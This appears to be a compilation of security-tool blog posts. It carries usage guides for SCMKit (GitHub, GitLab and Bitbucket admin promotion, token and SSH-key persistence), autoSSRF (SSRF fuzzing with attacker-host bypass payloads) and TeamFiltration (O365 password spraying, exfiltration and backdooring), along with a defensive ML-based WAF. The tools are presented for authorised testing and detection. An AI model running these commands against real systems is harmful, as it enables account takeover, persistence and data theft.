SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local

Module: listsnippet
System: gitlab
Auth Type: Username/Password
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:17:36 PM

Title | Raw URL
spell-script | https://gitlab.hogwarts.local/-/snippets/2/raw

List Runners

Use Case

List all GitLab runners available to the current user in GitLab


Provide the listrunner module, along with any relevant authentication information and URL. If the user is an administrator, you will be able to list all runners within the GitLab Enterprise instance, which includes shared and group runners.

GitLab Enterprise

SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local

Module: listrunner
System: gitlab
Auth Type: Username/Password
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/25/2022 11:40:08 AM

ID | Name | Repo Assigned
2 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
3 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git

List Gists

Use Case

List gists owned by the current user in GitHub


Provide the listgist module, along with any relevant authentication information and URL.

GitHub Enterprise

SCMKit.exe -s github -m listgist -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listgist -c apikey -u https://github.something.local

Example Output

C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local

Module: listgist
System: github
Auth Type: Username/Password
Target URL: https://github-enterprise.hogwarts.local

Timestamp: 1/14/2022 9:43:23 PM

Description | Visibility | URL
Shell Script to Decode Spell | public | https://github-enterprise.hogwarts.local/gist/c11c6bb3f47fe67183d5bc9f048412a1

List Orgs

Use Case

List all organizations the current user belongs to in GitHub


Provide the listorg module, along with any relevant authentication information and URL.

GitHub Enterprise

SCMKit.exe -s github -m listorg -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listorg -c apiKey -u https://github.something.local

Example Output

C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local

Module: listorg
System: github
Auth Type: Username/Password
Target URL: https://github-enterprise.hogwarts.local

Timestamp: 1/14/2022 9:44:48 PM

Name | URL
Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos

Get Privileges of API Token

Use Case

Get the assigned privileges to an access token being used in a particular SCM system


Provide the privs module, along with an API key and URL.

GitHub Enterprise

SCMKit.exe -s github -m privs -c apiKey -u https://github.something.local

GitLab Enterprise

SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local

Module: privs
System: gitlab
Auth Type: API Key
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:18:27 PM

Token Name | Active? | Privilege | Description
hgranger-api-token | True | api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_user | Read-only for endpoints under /users. Essentially, access to any of the GET requests in the Users API.
hgranger-api-token | True | read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_repository | Read-only (pull) for the repository through git clone.
hgranger-api-token | True | write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.

Add Admin

Use Case

Promote a normal user to an administrative role in a particular SCM system


Provide the addadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to add an administrative role to.

GitHub Enterprise

SCMKit.exe -s github -m addadmin -c userName:password -u https://github.something.local -o targetUserName

SCMKit.exe -s github -m addadmin -c apikey -u https://github.something.local -o targetUserName

GitLab Enterprise

SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName

SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m addadmin -c userName:password -u https://bitbucket.something.local -o targetUserName

Example Output

C:\>SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.hogwarts.local -o hgranger

Module: addadmin
System: gitlab
Auth Type: API Key
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:19:32 PM

[+] SUCCESS: The hgranger user was successfully added to the admin role.

Remove Admin

Use Case

Demote an administrative user to a normal user role in a particular SCM system


Provide the removeadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to remove an administrative role from.

GitHub Enterprise

SCMKit.exe -s github -m removeadmin -c userName:password -u https://github.something.local -o targetUserName

SCMKit.exe -s github -m removeadmin -c apikey -u https://github.something.local -o targetUserName

GitLab Enterprise

SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName

SCMKit.exe -s gitlab -m removeadmin -c apikey -u https://gitlab.something.local -o targetUserName

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m removeadmin -c userName:password -u https://bitbucket.something.local -o targetUserName

Example Output

C:\>SCMKit.exe -s gitlab -m removeadmin -c username:password -u https://gitlab.hogwarts.local -o hgranger

Module: removeadmin
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:20:12 PM

[+] SUCCESS: The hgranger user was successfully removed from the admin role.

Create Access Token

Use Case

Create an access token to be used in a particular SCM system


Provide the createpat module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to create an access token for.

GitLab Enterprise

This can only be performed as an administrator. You will provide the username that you would like to create a PAT for.

SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName

SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName

Bitbucket Server

Creates PAT for the current user authenticating as. In Bitbucket you cannot create a PAT for another user, even as an admin. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the PAT ID that is shown after being created. You will need this when you need to remove the PAT in the future.

SCMKit.exe -s bitbucket -m createpat -c userName:password -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger

Module: createpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/20/2022 1:51:23 PM

ID | Name | Token
59 | SCMKIT-AaCND | R3ySx_8HUn6UQ_6onETx

[+] SUCCESS: The hgranger user personal access token was successfully added.

List Access Tokens

Use Case

List access tokens for a user on a particular SCM system


Provide the listpat module, along with any relevant authentication information and URL.

GitLab Enterprise

Only requires admin if you want to list another user's PAT's. A regular user can list their own PAT's.

SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser

SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser

Bitbucket Server

List access tokens for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local

List access tokens for another user (requires admin). Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local -o targetUser

Example Output

C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger

Module: listpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/20/2022 1:54:41 PM

ID | Name | Active? | Scopes
59 | SCMKIT-AaCND | True | api, read_repository, write_repository

Remove Access Token

Use Case

Remove an access token for a user in a particular SCM system


Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the target user PAT ID you would like to remove an access token for.

GitLab Enterprise

Only requires admin if you want to remove another user's PAT. A regular user can remove their own PAT. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT and also when you listed the PAT.

SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID

SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.something.local -o patID

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT.

SCMKit.exe -s bitbucket -m removepat -c userName:password -u https://bitbucket.something.local -o patID

Example Output

C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58

Module: removepat
System: gitlab
Auth Type: API Key
Options: 59
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/20/2022 1:56:47 PM

[*] INFO: Revoking personal access token of ID: 59

[+] SUCCESS: The personal access token of ID 59 was successfully revoked.

Create SSH Key

Use Case

Create an SSH key to be used in a particular SCM system


Provide the createsshkey module, along with any relevant authentication information and URL.

GitHub Enterprise

Creates SSH key for the current user authenticating as.

SCMKit.exe -s github -m createsshkey -c userName:password -u https://github.something.local -o "ssh public key"

SCMKit.exe -s github -m createsshkey -c apiToken -u https://github.something.local -o "ssh public key"

GitLab Enterprise

Creates SSH key for the current user authenticating as. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future.

SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"

SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"

Bitbucket Server

Creates SSH key for the current user authenticating as. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future.

SCMKit.exe -s bitbucket -m createsshkey -c userName:password -u https://bitbucket.something.local -o "ssh public key"

Example Output

List SSH Keys

Use Case

List SSH keys for a user on a particular SCM system


Provide the listsshkey module, along with any relevant authentication information and URL.

GitHub Enterprise

List SSH keys for current user. This will include SSH key ID's, which is needed when you would want to remove an SSH key.

SCMKit.exe -s github -m listsshkey -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listsshkey -c apiToken -u https://github.something.local

GitLab Enterprise

List SSH keys for current user.

SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://gitlab.something.local

Bitbucket Server

List SSH keys for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m listsshkey -c userName:password -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken

Module: listsshkey
System: gitlab
Auth Type: API Key
Target URL: https://gitlab.hogwarts.local

Timestamp: 2/7/2022 4:09:40 PM

SSH Key ID | SSH Key Value | Title
9 | .....p50edigBAF4lipVZkAM= | SCMKIT-RLzie
10 | .....vGJLPGHiTwIxW9i+xAs= | SCMKIT-muFGU

Remove SSH Key

Use Case

Remove an SSH key for a user in a particular SCM system


Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the target user SSH key ID to remove.

GitHub Enterprise

You have to provide the SSH key ID to remove. This ID was shown whenever you list SSH keys.

SCMKit.exe -s github -m removesshkey -c userName:password -u https://github.something.local -o sshKeyID

SCMKit.exe -s github -m removesshkey -c apiToken -u https://github.something.local -o sshKeyID

GitLab Enterprise

You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.

SCMKit.exe -s gitlab -m removesshkey -c userName:password -u https://gitlab.something.local -o sshKeyID

SCMKit.exe -s gitlab -m removesshkey -c apiToken -u https://gitlab.something.local -o sshKeyID

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the SSH key ID to remove. This ID was shown whenever you created the SSH key and is also shown when listing SSH keys.

SCMKit.exe -s bitbucket -m removesshkey -c userName:password -u https://bitbucket.something.local -o sshKeyID

Example Output

C:\>SCMKit.exe -s bitbucket -m removesshkey -u http://bitbucket.hogwarts.local:7990 -c username:password -o 16

Module: removesshkey
System: bitbucket
Auth Type: Username/Password
Options: 16
Target URL: http://bitbucket.hogwarts.local:7990

Timestamp: 2/7/2022 1:48:03 PM

[+] SUCCESS: The SSH key of ID 16 was successfully revoked.

List Admin Stats

Use Case

List admin stats in GitHub Enterprise


Provide the adminstats module, along with any relevant authentication information and URL. Site admin access in GitHub Enterprise is required to use this module

GitHub Enterprise

SCMKit.exe -s github -m adminstats -c userName:password -u https://github.something.local

SCMKit.exe -s github -m adminstats -c apikey -u https://github.something.local

Example Output

C:\>SCMKit.exe -s github -m adminstats -c username:password -u https://github-enterprise.hogwarts.local

Module: adminstats
System: github
Auth Type: Username/Password
Target URL: https://github-enterprise.hogwarts.local

Timestamp: 1/14/2022 9:45:50 PM

Admin Users | Suspended Users | Total Users
1 | 0 | 5

Total Repos | Total Wikis
4 | 0

Total Orgs | Total Team Members | Total Teams
1 | 0 | 0

Private Gis ts | Public Gists
0 | 1

List Branch Protection

Use Case

List branch protections in GitHub Enterprise


Provide the protection module, along with any relevant authentication information and URL. Optionally, supply a string in the options parameter to return matching results contained in repo names

GitHub Enterprise

SCMKit.exe -s github -m protection -c userName:password -u https://github.something.local

SCMKit.exe -s github -m protection -c apikey -u https://github.something.local

SCMKit.exe -s github -m protection -c apikey -u https://github.something.local -o reponame

Example Output

C:\>.\SCMKit.exe -u http://github.hogwarts.local -s github -c apiToken -m protection -o public-r

Module: protection
System: github
Auth Type: API Key
Options: public-r
Target URL: http://github.hogwarts.local

Timestamp: 8/29/2022 2:02:42 PM

Repo | Branch | Protection
public-repo | dev | Protected: True
Status checks must pass before merge:
Branch must be up-to-date before merge: True
Owner review required before merge: True
Approvals required before merge: 2
Protections apply to repo admins: True
public-repo | main | Protected: False


Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {266C644A-69B1-426B-A47C-1CF32B211F80}
  • User Agent String - SCMKIT-5dc493ada400c79dd318abbe770dac7c
  • Access Token & SSH Key Names - Access tokens and SSH keys that are created using the tool are prepended with SCMKIT- for the name.

For detection guidance of the techniques used by the tool, see the X-Force Red blog post.


autoSSRF - Smart Context-Based SSRF Vulnerabiltiy Scanner

By: Zion3R
12 November 2022 at 11:30

autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Different from other ssrf automation tools, this one comes with the two following original features :

  • Smart fuzzing on relevant SSRF GET parameters

    When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ..) and doesn’t interfere with everything else. This ensures that the original URL is still correctly understood by the tested web-application, something that might doesn’t happen with a tool which is blindly spraying query parameters.

  • Context-based dynamic payloads generation

    For the given URL : https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web-application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. It would result to interesting payloads such as : http://authorizedhost.attacker.com, http://authorizedhost%[email protected], etc.

Furthermore, this tool guarantees almost no false-positives. The detection relies on the great ProjectDiscovery’s interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.


python3 autossrf.py -h

This displays help for the tool.

usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]

-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode

Single URL target:

python3 autossrf.py -u https://www.host.com/?param1=X&param2=Y&param2=Z

Multiple URLs target with verbose:

python3 autossrf.py -f urls.txt -v


1 - Clone

git clone https://github.com/Th0h0/autossrf.git

2 - Install requirements

Python libraries :

cd autossrf 
pip install -r requirements.txt

Interactsh-Client :

go install -v github.com/projectdiscovery/interactsh/cmd/[email protected]


autoSSRF is distributed underΒ MIT License.

TeamFiltration - Cross-Platform Framework For Enumerating, Spraying, Exfiltrating, And Backdooring O365 AAD Accounts

By: Zion3R
11 November 2022 at 11:30

TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts. See the TeamFiltration wiki page for an introduction into how TeamFiltration works and the Quick Start Guide for how to get up and running!

This tool has been used internally since January 2021 and was publicly released in my talk "Taking a Dumb In The Cloud" during DefCON30.


You can download the latest precompiled release for Linux, Windows and MacOSX X64

The releases are precompiled into a single application-dependent binary. The size go up, but you do not need DotNetCore or any other dependencies to run them.


╬╬╬╬─ β•Ÿβ•¬β•¬β•œβ•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬
╬╬╬╬║ β”‚ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬║ β”‚β”‚ β•™β•¬β•¬β•œβ•˜ β””β•™β•œβ•¬β•¬β•¬β•¬β•¬β•¬
╬╬╬╬║ β•“β•₯β•₯╬╬╬╬╬╬β•₯β•₯β•– β”‚β”‚ β”‚ ╬╬╬╬╬
╬╬╬╬║ β•“β•¬β•«β•¬β•œβ•œβ”˜ β•™β•œβ•œβ•¬β•«β•¬β” β”‚β”‚ β”‚β”‚ └╬╬╬╬
╬╬╬╬─ β•¬β•¬β•œβ•™β•©β•¬β•–β•“ ╙╬╬╬ β”‚β”‚ β”‚β”‚ ╬╬╬╬
╬╬╬╬─ β•¬β•œ ╙╬╫╖╖ β•“ ╙╬╖ β”‚β”‚ β”œβ”‚β”‚ ╬╬╬╬
╬╬╬╬─ ╬╬ β•“β•– ╙╬╬╬╬╬╬╦ ╬╬ β”‚β”Œ ╓╬─││ ╓╬╬╬╬
╬╬╬╬─ ╓╬─ ╬╬╬ β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•œβ•œβ•œβ•¬β•¬β•– β•Ÿβ•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•¬β•• β”Œβ•¬β•¬β•¬β•¬β•¬
╬╬╬╬─ ╬╬─ β•™β•©β”˜ ╙╬╬╬╬╬╩ β•Ÿβ•¬β•¬ β•™β•œβ•œβ•œβ•œβ•œβ•œβ•œβ•œβ•œβ•¬β•¬β•–β•–β•–β•¦β•¬β•¬β•¬β•¬β•¬β•¬β•¬
╬╬╬╬─ ╬╬─ β•Ÿβ•¬β•¬ β”‚β”‚ ╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬─ ╬╬ ╦╖ β•—β•– ╬╬ β”‚β”‚ β”‚ ╬╬╬╬
╬╬╬╬─ └╬┐ ╙╬╖╖ β•“β•¬β•¬β•œ β•“β•¬β”˜ β”‚β”‚ β”‚ ╬╬╬╬
╬╬╬╬─ └╬╖ β•™β•©β•¨β•¬β•¬β•¬β•©β•¨β•œβ•œ ╒╬╬ β”‚β”‚ β”‚ ╬╬╬╬
╬╬╬╬─ ╙╬╬╬╖ β”Œβ•–β•«β•¬β•œβ”˜ β”‚β”‚ β”‚ ╬╬╬╬
╬╬╬╬─ ╙╩╬╬╬β•₯β•₯β•₯β•₯β•₯β•₯β•«β•¬β•¬β•œβ•œ β”‚β”‚ β”‚ ╬╬╬╬
╬╬╬╬─ β•™β•™β•œβ•œβ•œβ•› β”‚β”‚ β”‚ ╬╬╬╬
╬╬╬╬─ β”‚β”‚ β”‚ ╓╖╬╬╬╬╬
╬╬╬╬─ β”‚β”‚ ╬╦╦╬╬╬╬╬╬╬╬╬
╬╬╬╬─ β”‚β”‚ ╓╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬
╬╬╬╬─ ╬╬╬╖╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬

[οΏ½] TeamFiltration V0.3.3.7 PUBLIC, created by @Flangvik @TrustedSec

--outpath Output path to store database and exfiltrated information (Needed for all modules)

--config Local path to your TeamFiltration.json configuration file, if not provided will load from the current path

--exfil Load the exfiltration module

--username Override to target a given username that does not exist in the database
--password Override to target a given password that does not exist in the database
--cookie-dump Override to target a given account using it's refresk-cookie-collection

--all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)
--aad Exfiltrate information from Graph API (domain users and groups)
--teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)
--onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory)
--owa Exfiltrate information from the Outlook REST API ( The last 2k emails, both sent and received)
--owa-limit Set the max amount of emails to exfiltrate, default is 2k.
--jwt-tokens Exfiltrate JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)

--spray Load the spraying module

--aad-sso Use SecureWorks recent Azure Active Directory password brute-forcing vuln for spraying
--us-cloud When spraying companies attached to US Tenants (https://login.microsoftonline.us/)
--time-window Defines a time windows where spraying should accour, in the military time format <12:00-19:00>
--passwords Path to a list of passwords, common weak-passwords will be generated if not supplied
--seasons-only Password generated for spraying will only be based on seasons
--months-only Password generated for spraying will only be based on months
--common-only Spray with the top 20 most common passwords
--combo Path to a combolist of username:password
--exclude Path to a list of emails to exclude from spraying

--sleep-min Minimum minutes to sleep between each full rotation of spraying default=60
--sleep-max Maximum minutes to sleep between each full rotation of spraying default=100
--delay Delay in seconds between each individual authentication attempt. default=0
--push Get Pushover notifications when valid credentials are found (requires pushover keys in config)
--push-lo cked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)
--force Force the spraying to proceed even if there is less the <sleep> time since the last attempt

--enum Load the enumeration module

--domain Domain to perfom enumeration against, names pulled from statistically-likely-usernames if not provided with --usernames
--usernames Path to a list of usernames to enumerate (emails)
--dehashed Use the dehashed submodule in order to enumerate emails from a basedomain
--validate-msol Validate that the given o365 accounts exists using the public GetCredentialType method (Very RateLimited - Slow 20 e/s)
--validate-teams Validate that the given o365 accounts exists using the Teams API method (Recommended - Super Fast 300 e/s)
--validate-login Validate that the given o365 accounts by attemping to login (Noisy - triggers logins - Fast 100 e/s)

--backdoor Loads the interactive backdoor module

--database Loads the interactive database browser module

--debug Add burp as a proxy on


--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --all
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --backdoor
--outpath C:\Clients\2021\FooBar\TFOutput --config myCustomConfig.json --database


NGWAF - First Iteration Of ML Based Feedback WAF

By: Zion3R
10 November 2022 at 11:30

The Motivation | What is the N3XT ST3P?

With the explosive growth of web applications since the early 2000s, web-based attacks have progressively become more rampant. One common solution is the Web Application Firewall (WAF). However, tweaking rules of current WAFs to improve the detection mechanisms can be complex and difficult. NGWAF seeks to address these drawbacks with a novel machine learning and quarantine-to-honeypot based architecture.

Inspired by actual pain points from operating WAFs, NGWAF intends to simplify and reimagine WAF operations through the following processes:

Pain point NGWAF Feature
Maintenance of detection mechanisms and rules can be complex Leverage machine learning to automate the process of creating and updating detection mechanisms
Immediate blocking of malicious traffic reduces chances of learning from threat actor behavior for future WAF improvements Threat elimination through redirected quarantine as opposed to conventional dropping and blocking of malicious traffic

To make deployment simple and portable, we have containerised the different components in the architecture using docker and configured them in a docker-compose file. This allows running it on a fresh install to be quick and easy as the dependencies are handled by docker automatically. The deployment can be expanded to be deployed into a local or cloud provider based kubernetes cluster, making scalabe as users can increase the number of nodes/pods to handle large amounts of traffic.

The deployment have been tested on macOS (Docker desktop), linux (ubuntu).

Check out our demo video here

NGWAF is created by @yupengfei, @zhangbosen, @matthewng and @elizabethlim

Special shoutout to @ruinahkoh for her contributions to the initial stages of NGWAF.

How does NGWAF work?

NGWAF runs out-of-the-box with three key components, these components as mentioned above are all containerised and are scalable according to desired usage. The protected resource can be customised by making a deployment change within the setup.

High level architecture of NGWAF with expected traffic flows from different parties

Key Benefits

NGWAF was engineered with the following key user benefits in mind:

1. Rule Complexity Reduction

NGWAF replaces traditional rulesets with deep learning models to reduce the complexity of managing and updating rules. Instead of manually editting rules, NGWAF's machine learning automates the pattern learning process from malicious data. Data collected from the quarantine environment are automatically scrubbed and batched, allowing it to be retrained into our detection model if desired.

2. Cyber Deception

NGWAF adopts a novel architecture consisting an interactive and quarantine environment built to isolate potential hostile attackers. Unlike conventional WAFs which blocks upon detection, NGWAF diverts threat actors to emulated systems, trapping them to soften the impact of their malicious actions. The environment also act as a sinkhole to gather current attack methods, enabling the observation and collection of malicious data. These data can be used to further improve NGWAF's detection capability.

NGWAF in action: Upon detection of SQL injection, NGWAF redirects to our quarantine environment, instead of dropping or blocking the attempt.

3. Compliance to Internationally Recognised Standards

The guiding principal behind the creation of NGWAF is to guard against the risks highlighted from the Open Web Application Security Project's standard awareness document - The OWASP Top 10 2021.

Training data and compliance checks for NGWAF are collected and conducted based on this requirement.

The Components of NGWAF

1. The Brains - Machine-Learning based WAF | Who needs manual when we can go NEURAL

Instead of traditional rulesets which require analysts to manually identify and add rules as time goes by, NGWAF leverages end-to-end machine learning pipelines for the detection mechanism, greatly reducing the complexity in WAF rule management, especially for detecting complex payloads.

Base Model

To do so, we needed to first create a base model and architecture that users can start off with, before they later use data collected from their own applications for retraining and fine-tuning:

  1. We collected malicious and non-malicious payloads from various application logs (total of ~40k observations)
  2. Instead of manually identifying rules, we leverage machine and deep learning to automate the process of learning patterns from previous malicious data.
  3. We then experimented with several model architectures, and our final model utilized a sequential neural network to predict whether an incoming payload was malicious or not.


Our model was able to achieve 99.6% accuracy on our training dataset.

Maintenance & Retraining

Although we have included logs from various applications in order to improve the generalizability of the base model, further maintenance and retraining of the model will be important to:

  1. Tune the model for better performance on traffic from the user's specific application
  2. Reduce model degradation over time, as threat actors discover new methods and opportunities

To address this, users of NGWAF benefit from our packaged end-to-end model retaining pipeline, and can easily trigger model maintenance with a few simple steps without having to dig under the hood. (See Section 3 below).

2. The Looking Glass - Scalable Interactive Quarantine Environment | Don't let them go, DETAIN THEM!

Contrary to traditional WAFs where malicious traffic are blocked or dropped right away. NGWAF is going with a more flexible approach. Whereby, it redirects and detains malicious actors within a quarantine environment. This environment consists of various interactive emulated honeypots to try and gather more attack methods/data, these data will be utilised to potentially enhance NGWAF's detection rate of more modern and complex attacks.

Capturing of Malicious data and Auto-Scrubbing for retraining purposes

Currently, NGWAF's quarantine environment forwards all data submitted by the trapped attacker to our ELK stack for analysis and visualisation. The data are auto-scrubbed into different components of the HTTP request, then packaged internally on the environment's backend in JSON format before forwarding. This helps to lower the manpower cost required to clean and index the data when we kickstart the retraining process.

Creating your customised quarantine environment

NGWAF currently provides users to make changes to the look and feel of the front-end aspect of our honeypots within the quarantine environment (based off a customised version of drupot). Users simply have to replace the assets folder within the docker volume with their front-end assets of choice.

NGWAF is also accommodating to users who would like to link their own honeypots as part of the quarantine environment. Users just have to forward the honeypot's HTTP requests to the environment's backend server (backend processes will automatically scrub and forward data to the analysis dashboard - ELK stack).

3. The Library - Retraining Sequence to Reinforce the Brains | Smart isn't really smart till you can keep learning.

As new payloads and attack vectors emerge, it is important to upgrade detection capabilities in order to ensure security. Hence, a retraining function is built into NGWAF to ensure defenders are able to train the machine learning model to detect those newer payloads.

Retraining of datasets is one of the main features in NGWAF. On our dashboard, users can insert new dataset for retraining, to strengthen and improve the quality of NGWAF detection of malicious payloads.


This can be achieved in the following steps:

  1. Create a new dataset (.csv) for upload in the following format (empty column, training data, label). You can refer to patch_sqli.csv as an example.

  2. Navigate to http://localhost:8088 to view NGWAF admin panel.

  3. Select the "Import Dataset" tab and upload the training set you have created


  1. Confirm that the training set have been uploaded successfully under the "Manage Datasets" tab.

  1. Under "Manage Model" tab, select the dataset(s) you want to retrain the model on and click on the "UPDATE WAF MODEL" button.Β 

  1. Congrats! The model should finish re-training after some time.

4. Additional Features:

NGWAF uses ELK stack to capture logs of network data that passes through NGWAF, allowing users to monitor the traffic that passes through the NGWAF for further analysis.


NGWAF also comes with live Telegram notification, to inform owners about live malicious threats that is detected by NGWAF.


Sample Usage Scenarios

  1. Newly normal application (Use the inbuilt web cloner / create another duplicate deployment to use as isolation environment)
  2. Integrate into existing honeypot/honeynet (Update the configuration to point to honeypot/honeynet)

Setting up NGWAF | Requirements, installation, and usage


Tested Operating Systems

  1. macOS (Docker Desktop)
  2. linux

WAF Component

  1. Python
  2. request
  3. fastapi
  4. pandas
  5. scikit-learn
  6. tensorflow (tentative)
  7. nltk

WAF Admin Panel Component

  1. fastapi
  2. scikit-learn
  3. nltk
  4. pandas
  5. Create React App
  6. React Material Admin Template by Flatlogic

Decode Layer

  1. Cyberchef Server

Caching Layer

  1. Redis

Quarantine Environment

  1. Drupot
  2. Elastic Search Stack Components (Elasticsearch, Logstash, Kibana, Filebeats)

Web App

  1. DVWA
  2. OWASP

Installation and Usage

With Docker running, run the following file using the command below:


To replace the targets, point the dest_server and honey_pot_server variable to the correct targets in the /waf/WafApp/waf.py file

# Replace me
dest_server = "dvwa"
honey_pot_server = "drupot:5000"

Once the Docker container is up, you can visit your localhost, in which these ports are running these services:

